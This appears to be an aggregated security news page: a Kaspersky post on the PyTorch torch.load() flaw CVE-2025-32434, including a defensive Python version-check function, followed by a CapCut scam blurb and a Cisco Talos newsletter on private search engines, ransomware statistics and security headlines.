The PyTorch framework, among other things, allows users to save trained models to a file that stores the weights. And, of course, load them from the file using the torch.load() function. Trained models are often shared via various public repositories and, theoretically, they may contain malicious implants. Therefore, the official documentation of the PyTorch project recommends using the torch.load() function with the weights_only=True parameter for security purposes (this way, only primitive data types are loaded: dictionaries, tensors, lists, and so on).

CVE-2025-32434 exists because of an incorrectly implemented deserialization mechanism used when loading a model. The researcher who discovered it demonstrated that an attacker can craft a model file for which the weights_only=True restriction does not hold: loading the malicious model leads to arbitrary code execution that can compromise the environment in which the model is run.

How to stay safe?

The researcher did not publish a detailed method for exploiting this vulnerability, and at the moment there is no evidence that someone is using CVE-2025-32434 in real attacks. However, the very fact of releasing a patch always attracts both researchers and attackers to the problem, so proof-of-concept exploits are most likely already being developed.

The PyTorch developers fixed CVE-2025-32434 in release 2.6.0. All previous versions, up to and including 2.5.1, remain vulnerable and should be updated as soon as possible. If that is not possible for some reason, the researchers recommend not relying on torch.load() with weights_only=True as a safety boundary for untrusted models, and temporarily switching to alternative methods of loading models.
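The practical consequence of the advice above is a version gate in whatever code loads third-party checkpoints. The following is an added example written for this edit, not PyTorch's or Kaspersky's code: it refuses to call torch.load() on an untrusted file while the installed PyTorch is affected, and on a fixed version still passes weights_only=True. Treating a pre-release build of 2.6.0 as affected is our conservative choice, since such a build may predate the fix, and the safetensors fallback named in the error message is our suggestion; the post only says to use an alternative loading method.

```python
"""Refuse torch.load() on untrusted checkpoints while the installed PyTorch is affected by
CVE-2025-32434.

Added example for this edit, not PyTorch's or Kaspersky's code. Version parsing treats a
pre-release build of 2.6.0 as still affected (our conservative choice). The safetensors
fallback in the error message is our suggestion; the post only says to use an alternative
loading method.
"""
import re

FIXED_IN = (2, 6, 0)
_VER = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?P<pre>(?:a|b|rc|dev)\d*)?")


def parse_version(v):
    """'2.5.1+cu121' -> ((2, 5, 1), False); '2.6.0a0+git1234' -> ((2, 6, 0), True)."""
    m = _VER.match(v)
    if not m:
        raise ValueError(f"unparseable PyTorch version: {v!r}")
    major, minor, patch = (int(x or 0) for x in m.groups()[:3])
    return (major, minor, patch), bool(m.group("pre"))


def is_vulnerable(version):
    """True for every release up to 2.5.1 and for pre-release builds of 2.6.0."""
    release, prerelease = parse_version(version)
    if release < FIXED_IN:
        return True
    return release == FIXED_IN and prerelease


def load_untrusted_checkpoint(path, torch_version=None):
    """torch.load(weights_only=True) gated on a fixed PyTorch. torch is imported lazily so the
    version policy can be exercised (and unit-tested) without PyTorch installed."""
    if torch_version is None:
        import torch
        torch_version = torch.__version__
    if is_vulnerable(torch_version):
        raise RuntimeError(
            f"PyTorch {torch_version} is affected by CVE-2025-32434: weights_only=True is not a "
            "safe boundary for untrusted files. Upgrade to >= 2.6.0, or load weights from a "
            "safetensors file instead of a pickle-based checkpoint.")
    import torch
    return torch.load(path, map_location="cpu", weights_only=True)


if __name__ == "__main__":
    for v in ("2.5.1+cu121", "2.6.0a0+git1234", "2.6.0+cu124", "2.7.1"):
        print(v, "vulnerable" if is_vulnerable(v) else "fixed")
```

The gate belongs at the point where a file of unknown origin is opened, not at import time: a fixed PyTorch does not make an already-loaded malicious checkpoint safe, and the check must see the version actually running, not the one pinned in requirements.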

In addition, we recommend paying special attention to protecting virtual and cloud environments – this is easiest to do using specialized solutions.

Kaspersky official blog – Read More

CapCut copycats are on the prowl

Cybercriminals lure content creators with promises of cutting-edge AI wizardry, only to attempt to steal their data or hijack their devices instead

WeLiveSecurity – Read More

Care what you share

Welcome to this week’s edition of the Threat Source newsletter. 

As we navigate our daily routines, certain tasks become second nature to us, especially if they are integral to our professions. However, what feels instinctive to one person might be foreign to another. This disparity is akin to a skilled musician effortlessly playing a complex melody, while someone without musical training might appreciate the beauty of the music in a different way. Both may enjoy music, but they experience it from different perspectives. 

Lately, I’ve found myself thinking about these differences in the context of online interactions, particularly with search engines. I’ve become increasingly frustrated with how they try to influence my buying behavior or try to “enhance” search results with AI. It’s often unsuccessful, as many of you have experienced. I once looked up something for my father-in-law and got swamped for weeks after with advertisements absolutely irrelevant to me. 

It’s easy to overlook that when using a search engine, the exchange of knowledge is not one-sided. It’s not only users who gain knowledge from indexed content, but search engines also acquire detailed insights into user behavior and preferences. You may unknowingly share sensitive information that could be stored for extended periods or shared with third parties for advertising or other purposes. I tried to get around this by shifting to privacy-focused search engines but wasn’t happy with the experience, either because of smaller or different indexes, or I was missing results in my native language. 

Luckily, I came across an open-source project called SearXNG, a “free internet metasearch engine which aggregates results from up to 229 search services. Users are neither tracked nor profiled.” 

I like it for three reasons: 

  1. You can try one of the public instances and check if you like it before you go all-in.
  2. You can self-host it on bare metal, in Docker or LXC, giving you even more control over your data. 
  3. With OpenSearch, it seamlessly integrates with your existing browser. 

It took me a couple of days to get used to it, but I do really like it now. It’s not perfect, but it is a real timesaver. As a bonus, the search syntax for advanced use is easy to memorize: 

  • “:en”, “:de” or “:fr” to search in a given language 
  • “!social_media” or “!news” to search just a given category 

The same principle applies to the increasing number of AI and large language models (LLMs) that process your queries — they also gather information about you. There are initiatives like Perplexica on GitHub that aim to bridge the gap for AI-assisted searches, although I haven’t explored them in detail. Additionally, if your interactions extend beyond simple searches to more profound inquiries, such as asking an LLM about the meaning of life, it’s wise to first assess the trustworthiness of the engine or the company behind it. Care what you share.

The one big thing 

We are continuing our discussion of Talos’ 2024 Year in Review report, looking at each section in detail. This week, let’s examine ransomware.

Why do I care? 

Ransomware actors overwhelmingly leveraged valid accounts for initial access in 2024, with this tactic appearing in almost 70% of related cases.  

Ransomware actors exploited public-facing applications nearly 20% of the time. The Known Exploited Vulnerabilities Catalog for 2024 lists 28 of 186 vulnerabilities as “Known to be used in Ransomware Campaigns”, with CVE IDs from every year between 2012 and 2024 except 2015.

So now what? 

These are major risks which can be mitigated by applying basic cyber hygiene principles. Please update and patch your software, and protect your credentials. Tune in next week to learn about multi-factor authentication (MFA) and identity threats, and why you need to do more than just enable MFA.

Top security headlines of the week 

  • OpenAI cuts safety tests in “reckless” AI push. According to the article, testing has gone down from six months to just days. We all know that even with six months of testing any model, it’ll never be quite perfect. (MSN) Further compounding this: 
  • AI-hallucinated code dependencies become new supply chain risk. “Slopsquatting” (as a spin on typosquatting) has become a thing. Threat actors can check with one or more AI models what packages they hallucinate and upload their malicious ones to PyPI or npm. (BleepingComputer)
  • Windows Recall seems to be back again. More privacy-related news. If I recall (pun intended) correctly, in May last year Microsoft introduced Recall — a feature which constantly takes screenshots, indexes them, and makes them searchable for you. After a huge backlash in the community, and the creation of tools like TotalRecall, Microsoft paused the launch last June. (BleepingComputer)
  • The 25-year-old CVE program seemed to be at risk. MITRE warned on April 15 that its contract to maintain the Common Vulnerabilities and Exposures (CVE) program would expire on April 16. This was big. In Q1 alone about 11,781 vulnerabilities were added to the database (with 415 rejected). Stopping this would have caused a lot of trouble. (Krebs on Security) However, the Cybersecurity and Infrastructure Security Agency (CISA) announced that it had exercised an option to extend MITRE’s contract—reportedly for another 11 months, according to multiple sources.

Can’t get enough Talos? 

  • Unmasking the new XorDDoS controller and infrastructure. Cisco Talos observed the ongoing global spread of the XorDDoS malware, predominantly targeting the United States, with evidence suggesting Chinese-speaking operators are using sophisticated tools to orchestrate widespread attacks. 
  • Talos Takes: Year in Review Special (Pt. 2). Azim Khodjibaev and Lexi DiScola join Hazel to discuss some of the most prolific ransomware groups (and why LockBit may end this year very differently to how they ended 2024).

Upcoming events where you can find Talos 

Most prevalent malware files from Talos telemetry over the past week  


Cisco Talos Blog – Read More